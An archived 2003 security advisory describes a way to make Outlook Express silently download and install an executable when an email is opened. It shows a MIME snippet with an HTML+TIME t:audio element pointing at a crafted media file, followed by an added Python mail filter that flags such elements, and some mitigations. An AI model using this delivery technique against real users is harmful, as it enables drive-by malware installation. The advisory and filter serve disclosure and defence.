TUCoPS :: Windows :: bt231.txt

Restricted Zone: the OUTLOOK EXPRESS

Tuesday, 20 May, 2003

Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 

This can be achieved with the default settings of Outlook Express: 

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 

<html xmlns:t>
<t:audio  t:src=""  />

What that does is invoke our freakish media file, including our trusty 
and battle-hardened 0s URL flip, from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically, audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe, and that's the end of that.
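Added example for the defending side, not code from the advisory: a 
mail-filter check that parses a MIME message and reports every HTML+TIME 
media element in its text/html parts, the same <t:audio t:src=...> shape 
shown above, so the message can be quarantined before a preview pane 
renders it. The element set (t:audio, t:video, t:media, t:img, 
t:animation), the acceptance of either a t:src or a bare src attribute, 
the constructed sample messages and the example.invalid host are all 
assumptions of this example.

```python
"""Flag HTML+TIME media elements in MIME mail before a preview pane renders them.

Added example, not code from the advisory. Every text/html part is parsed and
each t:audio-style element is reported together with its src target, so a
gateway filter can quarantine the message instead of letting a preview pane
load the referenced media file. The element set, the src/t:src handling and
the sample messages are assumptions of this example.
"""
import email
from html.parser import HTMLParser

# HTML+TIME media elements that load an external resource (assumed set; the
# advisory itself only shows t:audio).
TIME_MEDIA_TAGS = {"t:audio", "t:video", "t:media", "t:img", "t:animation"}


class _TimeElementFinder(HTMLParser):
    """Collect HTML+TIME media elements and note whether xmlns:t is declared."""

    def __init__(self):
        super().__init__()
        self.declares_time_ns = False
        self.media = []  # (tag, src) in document order

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so "t:audio" and
        # "xmlns:t" compare directly; a valueless attribute arrives as None.
        attrs = dict(attrs)
        if tag == "html" and "xmlns:t" in attrs:
            self.declares_time_ns = True
        if tag in TIME_MEDIA_TAGS:
            # Accept either the t:src form from the advisory or a bare src
            # (assumption); an elided/empty value is reported as "".
            src = attrs.get("t:src") or attrs.get("src") or ""
            self.media.append((tag, src))


def find_time_media(raw_message):
    """Return [(part_index, tag, src, ns_declared)] for every HTML+TIME media
    element in any text/html part; an empty list means nothing to flag."""
    msg = email.message_from_bytes(raw_message)
    findings = []
    for idx, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        body = part.get_payload(decode=True) or b""
        try:
            text = body.decode(part.get_content_charset() or "utf-8", "replace")
        except LookupError:  # unknown charset label: still inspect the bytes
            text = body.decode("latin-1")
        finder = _TimeElementFinder()
        finder.feed(text)
        finder.close()
        for tag, src in finder.media:
            findings.append((idx, tag, src, finder.declares_time_ns))
    return findings


# Constructed sample with the shape of the advisory's message; the t:src value
# is left empty exactly as the advisory printed it.
ADVISORY_SHAPED_MAIL = b"""MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit

<html xmlns:t>
<t:audio  t:src=""  />
"""

# Constructed benign sample: an HTML5 <audio> element is not HTML+TIME and
# must not be flagged.
BENIGN_MAIL = b"""MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain

Hello
--b1
Content-Type: text/html

<html><body><p>Hello</p><audio src="x.mp3"></audio></body></html>
--b1--
"""

# Constructed sample: t:video with a bare src in a nested part and no xmlns:t
# declaration (example.invalid is a placeholder host).
VIDEO_MAIL = b"""MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b2"

--b2
Content-Type: text/plain

See the clip.
--b2
Content-Type: text/html; charset="us-ascii"

<html><body><t:video src="http://example.invalid/clip.asf"/></body></html>
--b2--
"""

if __name__ == "__main__":
    for name, raw in [("advisory-shaped", ADVISORY_SHAPED_MAIL),
                      ("benign", BENIGN_MAIL), ("t:video", VIDEO_MAIL)]:
        hits = find_time_media(raw)
        print(f"{name}: {'QUARANTINE' if hits else 'pass'} {hits}")
```

A finding with ns_declared False is still reported: the filter's job is to 
catch the element, not to judge whether a given renderer would honour the 
missing namespace declaration.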

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP and [WMP 9 fails]

First Step Working Example:

1. This is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability', which 
appears never to have been patched.

2. Disable scripting in the media player [if it helps]

3. Do not be lured into opening email and newsgroup posts from 
untrustworthy sources

End Call


